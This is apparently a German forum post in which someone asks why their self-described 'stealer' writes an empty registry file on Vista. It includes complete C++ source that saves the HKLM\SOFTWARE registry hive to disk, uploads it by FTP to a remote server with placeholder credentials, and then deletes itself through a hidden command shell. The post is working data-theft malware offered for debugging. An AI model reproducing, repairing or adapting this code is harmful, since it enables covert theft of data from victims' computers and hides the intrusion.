Der stealer ist so gecodet dass er den reg kopieren und auf nen server schicken soll. die reg hat aber 0kb. habs auf vista probiert. woran liegts?Code:#include <windows.h> #include <wininet.h> #include <process.h> #include <iostream> #include <fstream> #include <stdio.h> #include <conio.h> using namespace std; void upload(char *server, char *account, char *passwort); void save(); BOOL SelfDelete(); int main() { save(); char server[50] = {'serveradresse'}; char account[50] = {'username'}; char passwort[50] = {'passwort'}; upload(server, account, passwort); SelfDelete(); return EXIT_SUCCESS; } void upload(char *server, char *account, char *passwort) { HINTERNET hOpen, hConnection; hOpen = InternetOpen("FTP Upload", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); hConnection = InternetConnect(hOpen, server, INTERNET_DEFAULT_FTP_PORT, account, passwort, INTERNET_SERVICE_FTP, 0, 0); FtpPutFile(hConnection, "C:\\data.reg", "//data.reg", FTP_TRANSFER_TYPE_BINARY, 0); InternetCloseHandle(hConnection); InternetCloseHandle(hOpen); } void save() { HKEY key; RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\", 0, KEY_ALL_ACCESS, &key); RegSaveKey(key, "C:\\data.reg", 0); RegCloseKey(key); } BOOL SelfDelete() { TCHAR szFile[MAX_PATH], szCmd[MAX_PATH]; if((GetModuleFileName(0,szFile,MAX_PATH)!=0) && (GetShortPathName(szFile,szFile,MAX_PATH)!=0)) { lstrcpy(szCmd,"/c del "); lstrcat(szCmd,szFile); lstrcat(szCmd," >> NUL"); if((GetEnvironmentVariable("ComSpec",szFile,MAX_PATH)!=0) && ((INT)ShellExecute(0,0,szFile,szCmd,0,SW_HIDE)>32)) return TRUE; } return FALSE; }